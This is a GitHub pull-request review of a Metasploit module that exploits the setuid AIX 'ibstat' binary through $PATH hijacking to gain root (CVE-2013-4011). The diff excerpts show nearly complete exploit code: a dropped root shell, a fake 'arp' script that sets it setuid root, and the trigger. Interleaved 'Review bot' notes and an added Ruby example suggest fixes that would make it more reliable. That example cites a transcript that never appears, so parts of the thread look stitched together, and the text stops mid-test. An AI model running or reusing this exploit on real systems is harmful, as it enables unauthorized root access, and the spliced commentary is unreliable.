
Add AIX 6.1/7.1 ibstat $PATH Local Priv-Esc #3046

Merged
merged 8 commits into from Apr 3, 2014

3 participants

@wvu-r7 wvu-r7 self-assigned this Feb 27, 2014
@wvu-r7
wvu-r7 commented Feb 27, 2014

AIX! w00t!

@Meatballs1 Meatballs1 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ 'AIX' => '7.1',
+ }
+ ],
+
+ ],
+ 'DefaultTarget' => 1,
+ }
+ ))
+ register_options([
+ OptString.new("WritableDir", [ true, "A directory where we can write files", "." ]),
+ ], self.class)
+ end
+
+ def exploit
+
+ if not is_vuln()
@Meatballs1
Meatballs1 added a note Feb 27, 2014

fail_with(Failure::NotVulnerable, "Target is not vulnerable.") unless is_vuln

@Meatballs1 Meatballs1 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ cmd_exec "chmod 0555 " + arp_file
+ end
+
+ def verify_root(filename)
+ cmd_exec filename
+ id_output = cmd_exec "id"
+ if id_output.include? ("euid=0(root)")
+ print_good("Got root! (euid)")
+ elsif id_output.include?("uid=0(root)")
+ print_good("Got root!")
+ else
+ print_status("Exploit failed")
+ end
+ end
+
+ def is_vuln()
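
Review bot: verify_root (from the `def verify_root(filename)` line) only reports the outcome with print_* calls and returns nothing the caller can act on, so exploit continues the same way whether or not root was obtained. Return true/false from the uid branches (or fail_with on the `else` branch) and check it in exploit; also note that `cmd_exec filename` starts the setuid shell itself, so the `id` on the next line is run inside that shell and the session is left in it afterwards.
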
@Meatballs1
Meatballs1 added a note Feb 27, 2014

def is_vuln - without braces is Ruby style if no args

@Meatballs1
Meatballs1 added a note Feb 27, 2014

This should probably be implemented as the check method. See https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-check()-method

@Meatballs1 Meatballs1 and 1 other commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+require 'msf/core'
+require 'rex'
+
+class Metasploit4 < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ def initialize(info={})
+ super( update_info( info, {
+ 'Name' => 'ibstat $PATH Privilege Escalation',
+ 'Description' => %q{
+ This module exploits the trusted PATH environment variable of the SUID binary 'ibstat'.
+ },
+ 'Author' =>
+ [
+ 'Kristian Erik Hermansen', #original author
+ 'Sagi Shahar (sagi-) <sagi.shahar[at]mwrinfosecurity.com>', #msf module
@Meatballs1
Meatballs1 added a note Feb 27, 2014

Move (sagi-) to comment please

@wvu-r7
wvu-r7 added a note Feb 27, 2014

EOL whitespace.

@Meatballs1 Meatballs1 and 1 other commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ ))
+ register_options([
+ OptString.new("WritableDir", [ true, "A directory where we can write files", "." ]),
+ ], self.class)
+ end
+
+ def exploit
+
+ if not is_vuln()
+ return
+ end
+
+ root_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
+ arp_file = "#{datastore["WritableDir"]}/arp"
+
+ if (is_gcc_installed == true)
@Meatballs1
Meatballs1 added a note Feb 27, 2014

if is_gcc_installed

n.b. Ruby style would have method name gcc_installed?

@wvu-r7
wvu-r7 added a note Feb 27, 2014

EOL whitespace.

@wvu-r7
wvu-r7 added a note Feb 27, 2014

Why use GCC at all?

@Meatballs1 Meatballs1 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
@@ -0,0 +1,150 @@
+# Not sure if the deps are correct
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit4 < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
@Meatballs1
Meatballs1 added a note Feb 27, 2014

include Msf::Post::File

@Meatballs1 Meatballs1 and 1 other commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ def exploit
+
+ if not is_vuln()
+ return
+ end
+
+ root_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
+ arp_file = "#{datastore["WritableDir"]}/arp"
+
+ if (is_gcc_installed == true)
+ write_c_file("#{root_file}")
+ print_status("Compiling source...")
+ cmd_exec "gcc -o #{root_file} #{root_file}" + ".c"
+ print_status("Compilation completed")
+ print_status("Deleting source...")
+ cmd_exec "rm #{root_file}.c"
@Meatballs1
Meatballs1 added a note Feb 27, 2014

file_rm

@wvu-r7
wvu-r7 added a note Feb 27, 2014

Also, use parens for the call.

@wvu-r7
wvu-r7 added a note Feb 27, 2014

Note that file_rm uses rm -f.

@Meatballs1 Meatballs1 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ print_status("Compilation completed")
+ print_status("Deleting source...")
+ cmd_exec "rm #{root_file}.c"
+ else
+ cmd_exec "cp /bin/sh " + "#{root_file}"
+ end
+ print_status("Writing custom arp file...")
+ write_arp_file("#{arp_file}","#{root_file}")
+ print_status("Custom arp file written")
+ print_status("Updating PATH environment variable...")
+ cmd_exec 'PATH=.:$PATH'
+ cmd_exec 'export PATH'
+ print_status("Triggering vulnerablity...")
+ cmd_exec '/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null'
+ print_status("Removing custom arp...")
+ cmd_exec "rm #{arp_file}"
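
Review bot: the `PATH=.:$PATH` / `export PATH` pair is never undone after the `/usr/bin/ibstat` trigger, so the session keeps `.` at the front of its $PATH, and only `arp_file` is removed at the `rm #{arp_file}` line while `root_file`, which write_arp_file has just made a setuid-root binary inside WritableDir, stays on disk. Restore $PATH after the trigger and delete root_file once verify_root has run, so the module does not leave a persistent privilege-escalation artifact behind on the host.
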
@Meatballs1
Meatballs1 added a note Feb 27, 2014

file_rm

@Meatballs1 Meatballs1 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ cmd_exec 'export PATH'
+ print_status("Triggering vulnerablity...")
+ cmd_exec '/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null'
+ print_status("Removing custom arp...")
+ cmd_exec "rm #{arp_file}"
+ print_status("Checking root privileges...")
+ verify_root("#{root_file}")
+ end
+
+ def is_gcc_installed
+ print_status("Checking if gcc exists...")
+ gcc_version = cmd_exec 'gcc -v'
+ gcc_array = gcc_version.split("\n")
+ gcc_array.each do |res|
+ if res.include? ("gcc version")
+ print_good("gcc found! " + "(" + "#{res}" + ")")
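
Review bot: `gcc -v` prints its banner, including the "gcc version" line, to stderr, so the `res.include? ("gcc version")` match only fires if cmd_exec merges stderr into the result. Either append `2>&1` to the `gcc -v` command or test for the binary directly (`command -v gcc`) and drop the banner parsing altogether.
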
@Meatballs1
Meatballs1 added a note Feb 27, 2014

print_good("gcc found! (#{res})")

@Meatballs1 Meatballs1 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ print_status("Checking root privileges...")
+ verify_root("#{root_file}")
+ end
+
+ def is_gcc_installed
+ print_status("Checking if gcc exists...")
+ gcc_version = cmd_exec 'gcc -v'
+ gcc_array = gcc_version.split("\n")
+ gcc_array.each do |res|
+ if res.include? ("gcc version")
+ print_good("gcc found! " + "(" + "#{res}" + ")")
+ return true
+ end
+ end
+ print_status("gcc not found. Using /bin/sh from local system")
+ return false;
@Meatballs1
Meatballs1 added a note Feb 27, 2014

It's a ruby style to not put return on the last item so this line would just be:

false

Also no ;

@Meatballs1 Meatballs1 and 1 other commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+
+ def is_gcc_installed
+ print_status("Checking if gcc exists...")
+ gcc_version = cmd_exec 'gcc -v'
+ gcc_array = gcc_version.split("\n")
+ gcc_array.each do |res|
+ if res.include? ("gcc version")
+ print_good("gcc found! " + "(" + "#{res}" + ")")
+ return true
+ end
+ end
+ print_status("gcc not found. Using /bin/sh from local system")
+ return false;
+ end
+
+ def write_c_file(filename)
@Meatballs1
Meatballs1 added a note Feb 27, 2014

This could probably just use the write_file method. See https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/post/file.rb

@wvu-r7
wvu-r7 added a note Feb 27, 2014

Yes, use write_file.

@Meatballs1 Meatballs1 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+
+ def write_c_file(filename)
+ c_file = filename + ".c"
+ print_status("Dropping file " + c_file + "...")
+ cmd_exec "echo \"#include <stdio.h>\n\" > " + c_file
+ cmd_exec "echo \"int main()\" >> " + c_file
+ cmd_exec "echo \"{\" >> " + c_file
+ cmd_exec "echo \"setreuid(0,0);\" >> " + c_file
+ cmd_exec "echo \"setregid(0,0);\" >> " + c_file
+ cmd_exec "echo \"execve(\\\"/bin/sh\\\",NULL,NULL);\" >> " + c_file
+ cmd_exec "echo \"return 0;\" >> " + c_file
+ cmd_exec "echo \"}\" >> " + c_file
+ end
+
+ def write_arp_file(arp_file, bin_file)
+ cmd_exec "echo \"#!/bin/sh\" > " + arp_file
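
Review bot: the C source assembled in write_c_file only includes `<stdio.h>`, yet calls setreuid, setregid and execve, which are declared in `<unistd.h>`; that is an implicit declaration and may not build cleanly. The `"\n"` inside the Ruby double-quoted string on the `#include <stdio.h>\n` line is also expanded by Ruby into a literal newline in the middle of the shell command. Writing the whole source in one call (write_file, as suggested above) avoids both problems and the eight separate echo round-trips.
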
@Meatballs1
Meatballs1 added a note Feb 27, 2014

As above

@wvu-r7
wvu-r7 commented Feb 27, 2014

Well, looks like @Meatballs1 is reviewing this, too. :P

@Meatballs1 Meatballs1 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ ], self.class)
+ end
+
+ def exploit
+
+ if not is_vuln()
+ return
+ end
+
+ root_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
+ arp_file = "#{datastore["WritableDir"]}/arp"
+
+ if (is_gcc_installed == true)
+ write_c_file("#{root_file}")
+ print_status("Compiling source...")
+ cmd_exec "gcc -o #{root_file} #{root_file}" + ".c"
@Meatballs1
Meatballs1 added a note Feb 27, 2014

cmd_exec "gcc -o #{root_file} #{root_file}.c"

@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
@@ -0,0 +1,150 @@
+# Not sure if the deps are correct
+
+require 'msf/core'
+require 'rex'
@wvu-r7
wvu-r7 added a note Feb 27, 2014

Unnecessary.

@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
@@ -0,0 +1,150 @@
+# Not sure if the deps are correct
@wvu-r7
wvu-r7 added a note Feb 27, 2014
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
@@ -0,0 +1,150 @@
+# Not sure if the deps are correct
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit4 < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ def initialize(info={})
+ super( update_info( info, {
@wvu-r7
wvu-r7 added a note Feb 27, 2014

Brace unnecessary.

@Meatballs1 Meatballs1 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ if not is_vuln()
+ return
+ end
+
+ root_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
+ arp_file = "#{datastore["WritableDir"]}/arp"
+
+ if (is_gcc_installed == true)
+ write_c_file("#{root_file}")
+ print_status("Compiling source...")
+ cmd_exec "gcc -o #{root_file} #{root_file}" + ".c"
+ print_status("Compilation completed")
+ print_status("Deleting source...")
+ cmd_exec "rm #{root_file}.c"
+ else
+ cmd_exec "cp /bin/sh " + "#{root_file}"
@Meatballs1
Meatballs1 added a note Feb 27, 2014

cmd_exec "cp /bin/sh #{root_file}"

@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ 'AIX' => '6.1',
+ }
+ ],
+
+ [
+ 'IBM AIX Version 7.1',
+ {
+ 'Arch' => 'ppc',
+ 'Platform' => 'aix',
+ 'AIX' => '7.1',
+ }
+ ],
+
+ ],
+ 'DefaultTarget' => 1,
+ }
@wvu-r7
wvu-r7 added a note Feb 27, 2014

Brace unnecessary.

@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+
+ [
+ 'IBM AIX Version 7.1',
+ {
+ 'Arch' => 'ppc',
+ 'Platform' => 'aix',
+ 'AIX' => '7.1',
+ }
+ ],
+
+ ],
+ 'DefaultTarget' => 1,
+ }
+ ))
+ register_options([
+ OptString.new("WritableDir", [ true, "A directory where we can write files", "." ]),
@wvu-r7
wvu-r7 added a note Feb 27, 2014

Why .? /tmp is probably better.

@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ 'Platform' => 'aix',
+ 'AIX' => '6.1',
+ }
+ ],
+
+ [
+ 'IBM AIX Version 7.1',
+ {
+ 'Arch' => 'ppc',
+ 'Platform' => 'aix',
+ 'AIX' => '7.1',
+ }
+ ],
+
+ ],
+ 'DefaultTarget' => 1,
@wvu-r7
wvu-r7 added a note Feb 27, 2014

Missing DisclosureDate.

@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit4 < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ def initialize(info={})
+ super( update_info( info, {
+ 'Name' => 'ibstat $PATH Privilege Escalation',
+ 'Description' => %q{
+ This module exploits the trusted PATH environment variable of the SUID binary 'ibstat'.
+ },
+ 'Author' =>
+ [
+ 'Kristian Erik Hermansen', #original author
@wvu-r7
wvu-r7 added a note Feb 27, 2014

EOL whitespace.

@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+require 'rex'
+
+class Metasploit4 < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ def initialize(info={})
+ super( update_info( info, {
+ 'Name' => 'ibstat $PATH Privilege Escalation',
+ 'Description' => %q{
+ This module exploits the trusted PATH environment variable of the SUID binary 'ibstat'.
+ },
+ 'Author' =>
+ [
+ 'Kristian Erik Hermansen', #original author
+ 'Sagi Shahar (sagi-) <sagi.shahar[at]mwrinfosecurity.com>', #msf module
+ 'Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>', #msf module
@wvu-r7
wvu-r7 added a note Feb 27, 2014

EOL whitespace.

@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ gcc_array.each do |res|
+ if res.include? ("gcc version")
+ print_good("gcc found! " + "(" + "#{res}" + ")")
+ return true
+ end
+ end
+ print_status("gcc not found. Using /bin/sh from local system")
+ return false;
+ end
+
+ def write_c_file(filename)
+ c_file = filename + ".c"
+ print_status("Dropping file " + c_file + "...")
+ cmd_exec "echo \"#include <stdio.h>\n\" > " + c_file
+ cmd_exec "echo \"int main()\" >> " + c_file
+ cmd_exec "echo \"{\" >> " + c_file
@wvu-r7
wvu-r7 added a note Feb 27, 2014

EOL whitespace.

@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ if res.include? ("gcc version")
+ print_good("gcc found! " + "(" + "#{res}" + ")")
+ return true
+ end
+ end
+ print_status("gcc not found. Using /bin/sh from local system")
+ return false;
+ end
+
+ def write_c_file(filename)
+ c_file = filename + ".c"
+ print_status("Dropping file " + c_file + "...")
+ cmd_exec "echo \"#include <stdio.h>\n\" > " + c_file
+ cmd_exec "echo \"int main()\" >> " + c_file
+ cmd_exec "echo \"{\" >> " + c_file
+ cmd_exec "echo \"setreuid(0,0);\" >> " + c_file
@wvu-r7
wvu-r7 added a note Feb 27, 2014

EOL whitespace.

@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ return true
+ end
+ end
+ print_status("gcc not found. Using /bin/sh from local system")
+ return false;
+ end
+
+ def write_c_file(filename)
+ c_file = filename + ".c"
+ print_status("Dropping file " + c_file + "...")
+ cmd_exec "echo \"#include <stdio.h>\n\" > " + c_file
+ cmd_exec "echo \"int main()\" >> " + c_file
+ cmd_exec "echo \"{\" >> " + c_file
+ cmd_exec "echo \"setreuid(0,0);\" >> " + c_file
+ cmd_exec "echo \"setregid(0,0);\" >> " + c_file
+ cmd_exec "echo \"execve(\\\"/bin/sh\\\",NULL,NULL);\" >> " + c_file
@wvu-r7
wvu-r7 added a note Feb 27, 2014

EOL whitespace.

@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ end
+ end
+ print_status("gcc not found. Using /bin/sh from local system")
+ return false;
+ end
+
+ def write_c_file(filename)
+ c_file = filename + ".c"
+ print_status("Dropping file " + c_file + "...")
+ cmd_exec "echo \"#include <stdio.h>\n\" > " + c_file
+ cmd_exec "echo \"int main()\" >> " + c_file
+ cmd_exec "echo \"{\" >> " + c_file
+ cmd_exec "echo \"setreuid(0,0);\" >> " + c_file
+ cmd_exec "echo \"setregid(0,0);\" >> " + c_file
+ cmd_exec "echo \"execve(\\\"/bin/sh\\\",NULL,NULL);\" >> " + c_file
+ cmd_exec "echo \"return 0;\" >> " + c_file
@wvu-r7
wvu-r7 added a note Feb 27, 2014

EOL whitespace.

@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ end
+ print_status("gcc not found. Using /bin/sh from local system")
+ return false;
+ end
+
+ def write_c_file(filename)
+ c_file = filename + ".c"
+ print_status("Dropping file " + c_file + "...")
+ cmd_exec "echo \"#include <stdio.h>\n\" > " + c_file
+ cmd_exec "echo \"int main()\" >> " + c_file
+ cmd_exec "echo \"{\" >> " + c_file
+ cmd_exec "echo \"setreuid(0,0);\" >> " + c_file
+ cmd_exec "echo \"setregid(0,0);\" >> " + c_file
+ cmd_exec "echo \"execve(\\\"/bin/sh\\\",NULL,NULL);\" >> " + c_file
+ cmd_exec "echo \"return 0;\" >> " + c_file
+ cmd_exec "echo \"}\" >> " + c_file
@wvu-r7
wvu-r7 added a note Feb 27, 2014

EOL whitespace.

@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
@@ -0,0 +1,150 @@
+# Not sure if the deps are correct
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit4 < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ def initialize(info={})
+ super( update_info( info, {
+ 'Name' => 'ibstat $PATH Privilege Escalation',
+ 'Description' => %q{
+ This module exploits the trusted PATH environment variable of the SUID binary 'ibstat'.
@wvu-r7
wvu-r7 added a note Feb 27, 2014

$PATH like above.

@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ arp_file = "#{datastore["WritableDir"]}/arp"
+
+ if (is_gcc_installed == true)
+ write_c_file("#{root_file}")
+ print_status("Compiling source...")
+ cmd_exec "gcc -o #{root_file} #{root_file}" + ".c"
+ print_status("Compilation completed")
+ print_status("Deleting source...")
+ cmd_exec "rm #{root_file}.c"
+ else
+ cmd_exec "cp /bin/sh " + "#{root_file}"
+ end
+ print_status("Writing custom arp file...")
+ write_arp_file("#{arp_file}","#{root_file}")
+ print_status("Custom arp file written")
+ print_status("Updating PATH environment variable...")
@wvu-r7
wvu-r7 added a note Feb 27, 2014

$PATH for consistency.

@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ register_options([
+ OptString.new("WritableDir", [ true, "A directory where we can write files", "." ]),
+ ], self.class)
+ end
+
+ def exploit
+
+ if not is_vuln()
+ return
+ end
+
+ root_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
+ arp_file = "#{datastore["WritableDir"]}/arp"
+
+ if (is_gcc_installed == true)
+ write_c_file("#{root_file}")
@wvu-r7
wvu-r7 added a note Feb 27, 2014

Don't interpolate.

@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ cmd_exec "rm #{root_file}.c"
+ else
+ cmd_exec "cp /bin/sh " + "#{root_file}"
+ end
+ print_status("Writing custom arp file...")
+ write_arp_file("#{arp_file}","#{root_file}")
+ print_status("Custom arp file written")
+ print_status("Updating PATH environment variable...")
+ cmd_exec 'PATH=.:$PATH'
+ cmd_exec 'export PATH'
+ print_status("Triggering vulnerablity...")
+ cmd_exec '/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null'
+ print_status("Removing custom arp...")
+ cmd_exec "rm #{arp_file}"
+ print_status("Checking root privileges...")
+ verify_root("#{root_file}")
@wvu-r7
wvu-r7 added a note Feb 27, 2014

Don't interpolate.

@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+
+ root_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
+ arp_file = "#{datastore["WritableDir"]}/arp"
+
+ if (is_gcc_installed == true)
+ write_c_file("#{root_file}")
+ print_status("Compiling source...")
+ cmd_exec "gcc -o #{root_file} #{root_file}" + ".c"
+ print_status("Compilation completed")
+ print_status("Deleting source...")
+ cmd_exec "rm #{root_file}.c"
+ else
+ cmd_exec "cp /bin/sh " + "#{root_file}"
+ end
+ print_status("Writing custom arp file...")
+ write_arp_file("#{arp_file}","#{root_file}")
@wvu-r7
wvu-r7 added a note Feb 27, 2014

Don't interpolate.

@Meatballs1

Fundamentally this exploit doesn't drop a Metasploit payload and just elevates the current session. Metasploit exploits have to deliver a payload so will either have to drop an ARCH_CMD shell or drop an AIX binary!

@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ cmd_exec "rm #{arp_file}"
+ print_status("Checking root privileges...")
+ verify_root("#{root_file}")
+ end
+
+ def is_gcc_installed
+ print_status("Checking if gcc exists...")
+ gcc_version = cmd_exec 'gcc -v'
+ gcc_array = gcc_version.split("\n")
+ gcc_array.each do |res|
+ if res.include? ("gcc version")
+ print_good("gcc found! " + "(" + "#{res}" + ")")
+ return true
+ end
+ end
+ print_status("gcc not found. Using /bin/sh from local system")
@wvu-r7
wvu-r7 added a note Feb 27, 2014

See comment above about using GCC.

@wvu-r7 wvu-r7 and 1 other commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ cmd_exec "echo \"setregid(0,0);\" >> " + c_file
+ cmd_exec "echo \"execve(\\\"/bin/sh\\\",NULL,NULL);\" >> " + c_file
+ cmd_exec "echo \"return 0;\" >> " + c_file
+ cmd_exec "echo \"}\" >> " + c_file
+ end
+
+ def write_arp_file(arp_file, bin_file)
+ cmd_exec "echo \"#!/bin/sh\" > " + arp_file
+ cmd_exec "echo \"chown root " + bin_file + "\" >> " + arp_file
+ cmd_exec "echo \"chmod 4555 " + bin_file + "\" >> " + arp_file
+ cmd_exec "chmod 0555 " + arp_file
+ end
+
+ def verify_root(filename)
+ cmd_exec filename
+ id_output = cmd_exec "id"
@wvu-r7
wvu-r7 added a note Feb 27, 2014

Why id? whoami is probably better.

@wvu-r7
wvu-r7 added a note Feb 27, 2014

Oh, yeah, there's id -u, too. Forgot about that. Thanks, @Meatballs1.

@wvu-r7
wvu-r7 added a note Feb 27, 2014

Or id -un if you want output identical to whoami.

@Meatballs1
Meatballs1 added a note Feb 27, 2014

Post::Linux::Priv implements is_root? which would probably work instead of this method. Maybe it should be renamed as Nix::Priv though @jlee-r7 ?

@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
@@ -0,0 +1,150 @@
+# Not sure if the deps are correct
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit4 < Msf::Exploit::Local
+ Rank = ExcellentRanking
@wvu-r7
wvu-r7 added a note Feb 27, 2014

Two-space soft tabs.

@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ end
+
+ def verify_root(filename)
+ cmd_exec filename
+ id_output = cmd_exec "id"
+ if id_output.include? ("euid=0(root)")
+ print_good("Got root! (euid)")
+ elsif id_output.include?("uid=0(root)")
+ print_good("Got root!")
+ else
+ print_status("Exploit failed")
+ end
+ end
+
+ def is_vuln()
+ ls_output = cmd_exec "ls -l /usr/sbin/ibstat"
@wvu-r7
wvu-r7 added a note Feb 27, 2014

Why ls? test is probably better.

@wvu-r7
wvu-r7 added a note Feb 27, 2014

Or you can use find as suggested by @kernelsmith.

@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ print_status("Exploit failed")
+ end
+ end
+
+ def is_vuln()
+ ls_output = cmd_exec "ls -l /usr/sbin/ibstat"
+ if ls_output.include? ("-r-sr-xr-x")
+ print_good("Target is vulnerable")
+ return true
+ else
+ print_status("Target is not vulnerable")
+ return false
+ end
+ end
+end
+
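
Review bot: the `ls_output.include? ("-r-sr-xr-x")` test in is_vuln is brittle in both directions: any other permission layout with the setuid bit set (for example `-rwsr-xr-x`, or a mode string with a trailing ACL marker) reports "not vulnerable", and a matching mode string only proves the binary is setuid, not that its $PATH handling is unpatched. Check the setuid bit itself (`test -u /usr/sbin/ibstat`, or parse the owner-exec column for `s`/`S`) and, if possible, the installed fileset level as well, and return the result rather than printing it inside the method.
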
@wvu-r7
wvu-r7 added a note Feb 27, 2014

Extraneous newline.
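
The two checks this review keeps returning to, the `ls -l` mode match in is_vuln and the `id` substring match in verify_root, written so they parse the output instead of matching one literal string. This is an added example, not code from the PR or from the framework; the sample `ls -l` lines are constructed, and the `id` line mirrors the one in the test transcript further down.

```ruby
# Added example (not from the PR or from Metasploit): parse `ls -l` and `id`
# output robustly instead of substring-matching "-r-sr-xr-x" / "euid=0(root)".

# A 10-character mode field: file type, then rwx triplets for owner, group and
# other. In the owner-exec column 's' means setuid + exec, 'S' setuid without
# exec. A trailing '+', '.' or '@' (ACL / security-context marker) is tolerated.
MODE_RE = /\A[-bcdlps][-r][-w][-xsS][-r][-w][-xsS][-r][-w][-xtT][+.@]?\z/

# True when an `ls -l` line reports the setuid bit, whatever the other bits are.
# Anything that is not a mode string (an error message, "total 12") is false.
def setuid_from_ls?(ls_line)
  mode = ls_line.strip.split(/\s+/, 2).first.to_s
  return false unless mode.match?(MODE_RE)
  %w[s S].include?(mode[3]) # index 3 is the owner-exec column
end

# Parse `id` output such as "uid=20013521(user) gid=1(staff) euid=0(root)" into
# { "uid" => 20013521, "gid" => 1, "euid" => 0 }. The groups= list is ignored.
def parse_id(id_output)
  id_output.scan(/\b(uid|gid|euid|egid)=(\d+)/).each_with_object({}) do |(name, num), ids|
    ids[name] = num.to_i
  end
end

# Root means an effective uid of 0. `id` prints euid= only when it differs
# from uid, so fall back to uid when euid is absent. Empty/garbage output is
# never treated as root.
def root_from_id?(id_output)
  ids = parse_id(id_output)
  return false unless ids.key?('uid')
  (ids['euid'] || ids['uid']).zero?
end

# What a check method could report from the two command outputs. A setuid
# ibstat only shows the binary is setuid, not that it is unpatched, hence
# :appears_vulnerable rather than a definite verdict.
def assess(ls_output, id_output)
  return :already_root if root_from_id?(id_output)
  setuid_from_ls?(ls_output) ? :appears_vulnerable : :not_setuid
end
```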

@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ cmd_exec 'PATH=.:$PATH'
+ cmd_exec 'export PATH'
+ print_status("Triggering vulnerablity...")
+ cmd_exec '/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null'
+ print_status("Removing custom arp...")
+ cmd_exec "rm #{arp_file}"
+ print_status("Checking root privileges...")
+ verify_root("#{root_file}")
+ end
+
+ def is_gcc_installed
+ print_status("Checking if gcc exists...")
+ gcc_version = cmd_exec 'gcc -v'
+ gcc_array = gcc_version.split("\n")
+ gcc_array.each do |res|
+ if res.include? ("gcc version")
@wvu-r7
wvu-r7 added a note Feb 27, 2014

Extraneous space.

@Meatballs1

To help tidy up the whitespace, use ruby tools/msftidy.rb modules/exploits/aix/local/ibstat_path.rb until you get no warnings back.

@Meatballs1 Meatballs1 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ 'References' =>
+ [
+ [ 'CVE', '2013-4011' ],
+ [ 'OSVDB', '95420' ],
+ [ 'BID', '61287' ],
+ [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827' ],
+ [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756' ]
+ ],
+ 'Platform' => [ 'aix' ],
+ 'Arch' => [ 'ppc' ],
+ 'Targets' =>
+ [
+ [
+ 'IBM AIX Version 6.1',
+ {
+ 'Arch' => 'ppc',
@Meatballs1
Meatballs1 added a note Feb 27, 2014

I don't think you need to repeat the Arch and Platform in each target?

@wvu-r7
wvu-r7 commented Feb 27, 2014

Travis isn't marking this as a failed build when it should. We'll have to sort that out.

@wvu-r7 wvu-r7 commented on an outdated diff Feb 28, 2014
modules/exploits/aix/local/ibstat_path.rb
+ [
+ [
+ 'IBM AIX Version 6.1',
+ {
+ 'Arch' => 'ppc',
+ 'Platform' => 'aix',
+ 'AIX' => '6.1',
+ }
+ ],
+
+ [
+ 'IBM AIX Version 7.1',
+ {
+ 'Arch' => 'ppc',
+ 'Platform' => 'aix',
+ 'AIX' => '7.1',
@wvu-r7
wvu-r7 added a note Feb 28, 2014

Extraneous comma.

@wvu-r7
wvu-r7 commented Mar 20, 2014

The AIX box we have is AIX 4. I don't think we can test this immediately.

@sagishahar

No worries, I will try to get you access to an AIX box. If possible, give me a few days please.

@wvu-r7
wvu-r7 commented Mar 27, 2014

Works for me:

msf > use auxiliary/scanner/ssh/ssh_login
